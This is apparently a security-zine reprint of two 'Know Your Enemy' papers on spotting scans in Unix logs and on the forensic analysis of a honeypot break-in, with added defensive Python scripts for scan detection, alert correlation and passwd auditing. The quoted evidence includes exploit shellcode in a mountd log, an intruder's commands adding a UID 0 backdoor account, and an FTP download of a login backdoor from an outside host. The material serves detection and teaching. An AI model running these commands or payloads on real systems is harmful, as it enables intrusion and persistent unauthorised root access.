First, an sscan will log in as follows (this is a default scan with no modifications to any config files): /var/log/secure Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200 Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200 Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200 Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200 Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200 Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200 Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200 Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200 /var/log/maillog Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while reading line user=??? host=[192.168.11.200] Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while reading line user=??? host=[192.168.11.200] Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn root /var/log/messages Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or incomplete multibyte or wide character Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed sscan also scans for cgi-bin vulnerabilities. These probes will not be logged by syslogd, you will find them in access_log. 
I decided to include them anyway for your edification :)

/var/log/httpd/access_log
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/phf HTTP/1.0" 302 192
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/php.cgi HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/handler HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webgais HTTP/1.0" 404 168
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/websendmail HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/faxsurvey HTTP/1.0" 404 170
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/htmlscript HTTP/1.0" 404 171
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 174
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/perl.exe HTTP/1.0" 404 169
192.168.11.200 - - [14/Apr/1999:16:44:49 -0500] "GET /cgi-bin/wwwboard.pl HTTP/1.0" 404 172
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/ews/ews/architext_query.pl HTTP/1.0" 404 187
192.168.11.200 - - [14/Apr/1999:16:44:50 -0500] "GET /cgi-bin/jj HTTP/1.0" 404 163

Notice how a complete connection was made for all the ports (SYN, SYN-ACK, ACK) and then torn down. That is because sscan is determining at the application layer what is going on. Not only does sscan want to know if your ftp port is open, but what ftp daemon is running. The same can be said for imap, pop, etc. This can be seen in sniff traces using sniffit, a tool commonly used to sniff passwords.

mozart $ cat 172.17.6.30.21-192.168.11.200.7238
220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue Jun 9 10:43:14 EDT 1998) ready.
As you see above, a complete connection was made to determine the version of wu-ftpd that was running. When you see the complete connections in your logs, as shown above, you are most likely being scanned by an exploit tool. These tools are making a complete connection to determine what you are running.

Nmap, like most port scanners, does not care what you are running, but whether you are running specific services. For this, nmap has a powerful set of options, letting you determine what kind of connection to make, including SYN, FIN, Xmas, Null, etc. For a detailed description of these options, check out http://www.insecure.org/nmap/nmap_doc.html. Because of these options, your logs will be different based on the options selected by the remote user. A connection made with the -sT flag is a complete connection, so the logs will look similar to sscan; however, by default nmap scans more ports.

/var/log/secure
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No such file or directory
Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200
Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200
Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200

One thing to keep in mind is the -D (or decoy) option. This nmap option allows the user to spoof the source address. You may see scans from 15 different sources at the same time, but only one of them is the real one. It is extremely difficult to determine which of the 15 was the actual source.
More often, users will select the -sS flag for port scanning. This is a stealthier option, as only a SYN packet is sent. If the remote system responds, the connection is immediately torn down with a RST. The logs from such a scan look as follows (NOTE: Only the first five entries are included here).

/var/log/secure
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 14 21:25:09 mozart ipop3d[11720]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown
Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown

Notice all the errors in the connections. Since the SYN-ACK sequence is torn down before a complete connection can be made, the daemon cannot determine the source system. The logs show that you have been scanned; unfortunately, you do not know by whom. What is even more alarming is that on most other systems (including newer kernels of Linux), none of these errors would have been logged. To quote Fyodor: " ... based on all the 'connection reset by peer' messages. This is a Linux 2.0.XX oddity -- virtually every other system (including the 2.2 and later 2.1 kernels) will show nothing. That bug (accept() returning before completion of the 3-way handshake) was fixed."

Nmap includes other stealth options, such as -sF, -sX, -sN, where various flags are used. This is what the logs look like for these scans:

/var/log/secure

Notice something here, no logs!
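The three log signatures discussed above (a full connection that records the source, "connect from unknown" paired with the "can't get client address" warning, and no entry at all) can be checked mechanically rather than by eye. What follows is an added example written for this page, not code from the paper or from sscan or nmap: a Python script that parses /var/log/secure lines in the format shown, groups "connect from" events per source inside a short time window, and labels a burst that touches several different daemons as a full-connect scan, or as a half-open scan when the daemon never learned the client address. The sample log lines are constructed to match the paper's entries, the year is assumed because syslog omits it, and the window and service-count thresholds are assumptions to tune for your own hosts. It cannot see the -sF/-sX/-sN case, which is exactly the point the paper makes: nothing in syslog records it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the /var/log/secure format shown above (tcp_wrappers
# style "connect from" lines).  The first burst is a full-connect scan whose
# source is logged; the second is a SYN scan on a Linux 2.0 kernel, where the
# daemon logs "can't get client address" and "connect from unknown"; the last
# line is a single ordinary connection that should not be flagged.
SAMPLE_SECURE = """\
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can't get client address: Connection reset by peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 14 22:10:00 mozart in.ftpd[11800]: connect from 10.0.0.5
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ "
    r"(?P<daemon>[\w.]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
CONNECT_RE = re.compile(r"^connect from (?P<src>\S+)$")


def parse_secure(text, year=1999):
    """Yield (timestamp, daemon, pid, message) for each parseable line.
    syslog omits the year, so the caller supplies it (assumed 1999 here)."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["daemon"], int(m["pid"]), m["msg"]


def classify_scans(text, window_seconds=30, min_services=3):
    """Return one finding per source whose connections hit at least
    `min_services` different daemons inside `window_seconds`."""
    reset_pids = set()            # daemons that never learned the client address
    by_src = defaultdict(list)    # source -> [(timestamp, daemon)]
    for ts, daemon, pid, msg in parse_secure(text):
        if "can't get client address" in msg:
            reset_pids.add(pid)
            continue
        m = CONNECT_RE.match(msg)
        if not m:
            continue
        src = m["src"]
        if src == "unknown" and pid in reset_pids:
            src = "unknown(half-open)"
        by_src[src].append((ts, daemon))

    findings = []
    for src, items in by_src.items():
        items.sort()
        i = 0
        while i < len(items):
            start = items[i][0]
            j, services = i, set()
            while j < len(items) and (items[j][0] - start).total_seconds() <= window_seconds:
                services.add(items[j][1])
                j += 1
            if len(services) >= min_services:
                if src == "unknown(half-open)":
                    kind = "half-open (SYN) scan, source not logged"
                elif src == "unknown":
                    kind = "scan from unresolved source"
                else:
                    kind = f"full-connect scan from {src}"
                findings.append({"source": src, "kind": kind, "start": start,
                                 "count": j - i, "services": sorted(services)})
            i = j
    return findings


if __name__ == "__main__":
    for f in classify_scans(SAMPLE_SECURE):
        print(f"{f['start']:%b %d %H:%M:%S} {f['kind']}: "
              f"{f['count']} connections to {', '.join(f['services'])}")
```

Run against a real /var/log/secure, the half-open label only appears on kernels with the accept() quirk Fyodor describes; on anything newer, an empty result from this script tells you nothing, and a packet-level logger (tcplogd, ippl, or a firewall log) is the only place the scan will show.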
Scary, huh? You just got scanned and didn't even know it. All three types of scans determined the same results; however, you are able to fully log only the first type, -sT (full connection). To detect these stealth scans, you will need to use a different logging application such as tcplogd or ippl. Some commercial firewalls will also detect and log all of these scans (I have confirmed this on Checkpoint Firewall 1).

Did They Gain Access?

Once you have determined that you were scanned, and what they were looking for, the next big question is "Did they get in?". Most of today's remote exploits are based on buffer overflows (otherwise known as smashing the stack). Simply stated, a buffer overflow is when a program (usually a daemon) receives more input than it expected, thus overwriting critical areas in memory. Certain code is then executed, usually giving the user root access. For more info on buffer overflows, check Aleph1's excellent paper at ftp://ftp.technotronic.com/rfc/phrack49-14.txt. You can normally identify buffer overflow attacks in the /var/log/messages log file (or /var/adm/messages for other flavors of Unix) for attacks such as mountd. You will also see similar logs in maillog for such attacks against imapd. A buffer overflow attack would look like this.

Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 192.168.11.200.
Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P3Ű3Ŕ°^[Í~@3Ň3Ŕ~KÚ°^FÍ~@ţÂuô1Ŕ°^BÍ~@~EŔubëb^V¬<ýt^FţŔt^Këő°0ţČ~HF˙ëě^°^B~ I^FţČ~IF^D°^F~IF^H°f1ŰţĂ~IńÍ~@~I^F°^Bf~IF^L°*f~IF^N~MF^L~IF^D1Ŕ~IF^P°^P~IF^H° fţĂÍ~@°^A~IF^D°fł^DÍ~@ë^DëLëR1Ŕ~IF^D~IF^H°fţĂÍ~@~HĂ°?1ÉÍ~@°?ţÁÍ~@°?ţÁÍ~@¸.bin@~ I^F¸.sh!@~IF^D1Ŕ~HF^G~Iv^H~IF^L°^K~Ió~MN^H~MV^LÍ~@1Ŕ°^A1ŰÍ~@čE˙˙˙˙ý˙Privet ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51 mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^ E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E ^H(-^E^H(-^E When you see something like 
this in your log files, someone has attempted to exploit your system. It is difficult to determine if the exploit was successful. One way to do this is, following the exploit attempt, to see if there are any connections from the remote source to your system. If they successfully log in from the remote system, they have access. Another clue is if you find the accounts "moof", "rewt", "crak0", or "w0rm" added to your /etc/passwd file. These accounts, uid 0, are added by some of the more common exploit scripts.

Once a black-hat gains access, normally the first thing they do is wipe your logs clean and trojan your logging (syslogd); for more information, see Know Your Enemy: III. From this point on, you will not receive any logs from your system as everything has been compromised. What you do next is subject for another article :). Until then, I recommend you check out http://www.cert.org/nav/recovering.html

To help me find anomalies in my log files, I whipped up a shell script that scans my logs for me. For more detailed information on grepping and sorting log files, check out this posting by Marcus Ranum.

Bourne shell script
Korn shell script

Conclusion

Your system logs can tell you a great deal about the enemy. However, the first step is guaranteeing the integrity of your log files. One of the best ways to do that is to use a remote log server that receives and stores logs from all systems. Once secured, you can then identify patterns in your log files. Based on these patterns and log entries, you can determine what the black-hat is looking for, and potentially what tools they are using. Based on this knowledge, you can better secure and protect your systems.
@HWA

304.0 [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Study of an Attack
Know Your Enemy: A Forensic Analysis
Lance Spitzner
http://www.enteract.com/~lspitz/papers.html
Last Modified: 23 May 2000

This paper is a continuation of the Know Your Enemy series. The first three papers covered the tools and tactics of the black-hat community. This paper, the fourth of the series, studies step by step a successful attack of a system. However, instead of focusing on the tools and tactics used, we will focus on how we learned what happened and pieced the information together. The purpose is to give you the forensic skills necessary to analyze and learn on your own the threats your organization faces.

Background

The information covered here was obtained through the use of a honeypot. The honeypot was a default server installation of Red Hat 6.0. No modifications were made to the default install, so the vulnerabilities discussed here exist on any default RH 6.0 installation. Also, none of the data presented here has been sanitized. All IP addresses, user accounts, and keystrokes discussed here are real. This is done on purpose to both validate the data and give a better understanding of forensic analysis. Only the passwords have been modified to protect the compromised systems.

All sniffer information presented here is in snort format. Snort is my sniffer and IDS system of choice, due to its flexibility, capabilities, and price (it's free). All actions committed by the black-hat were captured with snort. I use the IDS signatures supplied by Max Vision at www.whitehats.com. You can query his arachNIDs database for more information on all the alerts discussed throughout this paper. You can find my snort configuration and signature file (including the command line options I use) here.
Once you are done reading the paper, you can conduct your own forensic analysis, as I have supplied all the raw data. As you read this paper, take note of how many different systems the black-hat uses. Also, throughout this paper, the black-hat is identified as she, but we have no idea what the true gender is.

The Attack

On 26 April, at 06:43 snort alerted me that one of my systems had been attacked with a 'noop' attack. Packet payloads containing noops are an indication of a buffer overflow attack. In this case, snort had detected the attack and logged the alert to my /var/log/messages file (which is monitored by swatch). Note: throughout this paper, the IP address 172.16.1.107 is the IP address of the honeypot. All other systems are the IP addresses used by the black-hat.

Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

My honeypots receive numerous probes, scans and queries on a daily basis. However, an alert like this gets my immediate attention, as it indicates a system may have been compromised. Sure enough, less than two minutes later system logs indicate the system is compromised, as our attacker initiates a connection and logs in to the box.

Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)

Our intruder has gained super user access and now controls the system. How was this accomplished, what happened? We will now begin our forensic analysis and put the pieces together, step by step.

The Analysis

When studying an attack, the best place to start is the beginning: where did the black-hat start? Black-hats normally start with information gathering; they need to determine what vulnerabilities exist before they can strike. If your system has been compromised, this is normally not the first time the black-hat has communicated with that system.
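The judgement made above, that a login on the victim seconds after a buffer-overflow alert against it means the exploit worked, is the kind of correlation worth automating so it fires while the intruder is still typing. The following is an added example for this page, not code from the paper or from snort or swatch: a Python script that reads a mixed stream of snort alert lines and PAM session lines in the formats shown, and pairs every alert with the logins and su's that follow it on the targeted host inside a window. The sample lines are constructed from the entries quoted above, the year is assumed since syslog omits it, and the mapping from the honeypot's IP address to the hostname it writes into its own syslog entries (lisa logs the alert, victim7 logs the sessions) is an assumption you would replace with your own inventory.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: the snort alert and the two PAM_pwdb lines quoted
# above, plus one later login that should not be tied to the alert.
SAMPLE_LOG = """\
Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)
Apr 26 09:15:02 victim7 PAM_pwdb[12600]: (login) session opened for user alice by (uid=0)
"""

# Assumed mapping from the IP the IDS sees to the hostname the victim writes
# into its own syslog entries.
HOST_FOR_IP = {"172.16.1.107": "victim7"}

TS = r"(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2})"
ALERT_RE = re.compile(
    TS + r" \S+ snort\[\d+\]: (?P<sig>\S+): (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<port>\d+)$")
SESSION_RE = re.compile(
    TS + r" (?P<host>\S+) PAM_pwdb\[\d+\]: \((?P<svc>\w+)\) session opened for user (?P<user>\S+) by (?P<by>.*)$")


def parse_ts(text, year=2000):
    """syslog timestamps carry no year; the year is assumed (2000 here)."""
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def correlate(log_text, host_for_ip=HOST_FOR_IP, window=timedelta(minutes=5)):
    """Pair every IDS alert with the logins and su's on the targeted host that
    follow it within `window`.  Each finding records who logged in, how long
    after the alert, and which signature and source triggered it."""
    alerts, sessions = [], []
    for line in log_text.splitlines():
        m = ALERT_RE.match(line)
        if m:
            alerts.append((parse_ts(m["ts"]), m["sig"], m["src"], m["dst"], int(m["port"])))
            continue
        m = SESSION_RE.match(line)
        if m:
            sessions.append((parse_ts(m["ts"]), m["host"], m["svc"], m["user"], m["by"]))

    findings = []
    for a_ts, sig, src, dst, port in alerts:
        victim = host_for_ip.get(dst)
        if victim is None:
            continue
        for s_ts, host, svc, user, by in sessions:
            if host == victim and a_ts <= s_ts <= a_ts + window:
                findings.append({
                    "alert": sig, "attacker": src, "port": port,
                    "event": svc, "user": user, "by": by,
                    "seconds_after_alert": int((s_ts - a_ts).total_seconds()),
                })
    findings.sort(key=lambda f: f["seconds_after_alert"])
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_LOG):
        print(f"{f['seconds_after_alert']:4d}s after {f['alert']} from {f['attacker']} "
              f"(port {f['port']}): {f['event']} session for {f['user']} by {f['by']}")
```

The correlation only works if the IDS sensor and the victim keep the same clock and the victim's logs reach a host the intruder cannot edit; both papers in this issue make that point about remote logging, and this script is useless without it.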
Most attacks involve some type of information gathering before the attack is launched. So, this is where we will start: the black-hat's information gathering stage. If we look at the alert above, the attack was on port 53. This indicates a DNS attack was launched on our system. So I will begin by looking through my snort alerts and find possible information probes for DNS. We find a DNS version query probe coming from the same system that attacked us.

Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53

Notice the date of the probe, April 25. Our system was attacked April 26, from the same system. Our system was compromised the day after the probe. I am guessing that an automated tool was used by our black-hat to scan numerous systems for a known DNS vulnerability. After the scan was run, the black-hat reviewed the results, identified vulnerable systems (including ours) and then launched her exploit.

We have now pieced together the first part of our story. Our black-hat scanned us on 25 April, then exploited the system the following day. Based on our IDS alerts, it appears we were hit by a script kiddie with a well known DNS vulnerability. But how was the attack launched, and how does it work? Let's find out.

The Exploit

Like most commercial IDS systems, snort has the capability of showing us the packet load data of all IP packets. We will use this capability to conduct an analysis of the exploit. The exploit information was obtained from the snort logs (stored in tcpdump binary format). I queried the snort log and began reviewing the packets starting when the attack was launched. I did not limit my information query to the host 63.336.81.13, as the attacker may have used other systems. This is in fact the case, as our black-hat used at least three different systems to run the exploit.
The goal of the exploit is to gain a root shell on the remote system. Once the black-hat gains a root shell, they can run any command as root. Normally an account is placed in the /etc/passwd and /etc/shadow file. You can find both the exploit and remote commands executed in the detailed forensic analysis. Once the exploit was run and a root shell obtained, the following commands were run as root.

cd /; uname -a; pwd; id;
Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd
echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow
echo "hantu::0:0::/:/bin/bash" >> /etc/passwd
echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow

Our black-hat runs several commands as root. First, she confirms the system she is on (uname -a), the directory (pwd) and then confirms her uid (id). She then adds two user accounts to the system, twin and hantu, both with the same password. Note that twin has the UID of 506 and hantu has the UID of 0 (on a side note, hantu means ghost in Indonesian). Remember, most systems do not let UID 0 telnet to the box. So she had to create an account that would give her remote access, then another account that would give her UID 0. So, our black-hat ran an exploit on DNS, gained a root shell, then inserted two accounts. Within 90 seconds of the exploit she telnets into the box and gains root access (see timestamps of logs below). So, what does she do next?

Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)

Gaining Access

Fortunately for us, telnet is a plaintext protocol; the data is not encrypted. This means we can decode the sniffer traces and capture all her keystrokes.
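The account pair added above (a UID 506 login account plus a UID 0 account sharing its password) and the uid-0 names listed in the earlier paper in this issue ("moof", "rewt", "crak0", "w0rm") are exactly what a passwd audit should catch, and the check is cheap enough to run from cron against a copy of the files. The following is an added example for this page, not code from the paper: a Python audit of /etc/passwd and /etc/shadow that flags UID 0 accounts outside an allow-list, empty password fields, the known backdoor names, accounts missing from shadow, and accounts that share an identical hash. The passwd and shadow fragments are constructed; the twin and hantu lines are the ones the intruder appended above, and the remaining hashes and salts are made up.

```python
# Constructed /etc/passwd and /etc/shadow fragments.  The twin and hantu
# lines are the ones the intruder appended (quoted above); rewt is one of
# the account names Know Your Enemy: Part II lists as added by exploit scripts.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
twin::506:506::/home/twin:/bin/bash
hantu::0:0::/:/bin/bash
rewt:x:0:0::/tmp:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$1$rootsalt$constructedhashA:10891:0:99999:7:::
bin:*:10891:0:99999:7:::
alice:$1$alicesalt$constructedhashB:10891:0:99999:7:::
twin:w3nT2H0b6AjM2:::::::
hantu:w3nT2H0b6AjM2:::::::
"""

# Names Know Your Enemy: Part II reports as added by common exploit scripts.
KNOWN_BACKDOOR_NAMES = {"moof", "rewt", "crak0", "w0rm"}
# Shadow fields that mean "no usable hash", so they cannot be shared hashes.
LOCKED = {"*", "!", "!!", "x", ""}


def audit_accounts(passwd_text, shadow_text, allowed_uid0=("root",)):
    """Return (account, reason) pairs for entries an exploit script typically
    leaves behind: extra UID 0 users, empty password fields, known backdoor
    names, accounts missing from shadow, and accounts sharing one hash."""
    findings = []
    shadow = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            shadow[fields[0]] = fields[1]

    by_hash = {}
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed passwd entry"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if uid == "0" and name not in allowed_uid0:
            findings.append((name, "uid 0 account not in allow-list"))
        if name in KNOWN_BACKDOOR_NAMES:
            findings.append((name, "account name used by known exploit scripts"))
        if pw == "":
            findings.append((name, "empty password field in /etc/passwd"))
        if name not in shadow:
            findings.append((name, "no /etc/shadow entry"))
        else:
            h = shadow[name]
            if h not in LOCKED:
                by_hash.setdefault(h, []).append(name)

    for h, names in by_hash.items():
        if len(names) > 1:
            findings.append((",".join(names), "accounts share an identical password hash"))
    return findings


if __name__ == "__main__":
    for account, reason in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account:12s} {reason}")
```

Compare the result against a known-good copy of the two files kept off the host; the intruder in this paper edits passwd and shadow from a root shell, so the copy on the box is not the reference.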
Snort has already done this for us, another reason I prefer snort. By analyzing the keystrokes snort captured of the telnet sessions, we can determine what our black-hat does. What I like best about decoding telnet sessions is that we capture not only STDIN (the keystrokes) but STDOUT and STDERR. Let's review the telnet sessions and identify the black-hat's activities (comments in RED).

First, our friend telnets to the box (from 213.28.22.189) as twin and then gains superuser access as hantu. Remember, she cannot just telnet in as hantu as UID 0 is restricted for remote access.

#' !"'!"# ' 9600,9600'VT5444VT5444
Red Hat Linux release 6.0 (Shedwig)
Kernel 2.2.5-15 on an i586
login: twin
Password: Password: hax0r
No directory /home/twin!
Logging in with home = "/".
[twin@apollo /]$ su hantu
Password: Password: hax0r

Next, our friend ftps to another system to get her toolkit.

[root@apollo /]# ftp 24.112.167.35
Connected to 24.112.167.35.
220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready.
Name (24.112.167.35:twin): welek
331 Password required for welek.
Password:password
230 User welek logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get bj.c
local: bj.c remote: bj.c
200 PORT command successful.
150 Opening BINARY mode data connection for bj.c (1010 bytes).
226 Transfer complete.
1010 bytes received in 0.115 secs (8.6 Kbytes/sec)
ftp> quit
221-You have transferred 1010 bytes in 1 files.
221-Total traffic for this session was 1421 bytes in 1 transfers.
221-Thank you for using the FTP service on linux.
221 Goodbye.

Third, she grabs her backdoor, compiles bj.c, and installs it as a replacement for /sbin/login. Notice all the commands executed at the command prompt for the compile. It appears that all the compile commands were executed 'cut and paste' style.
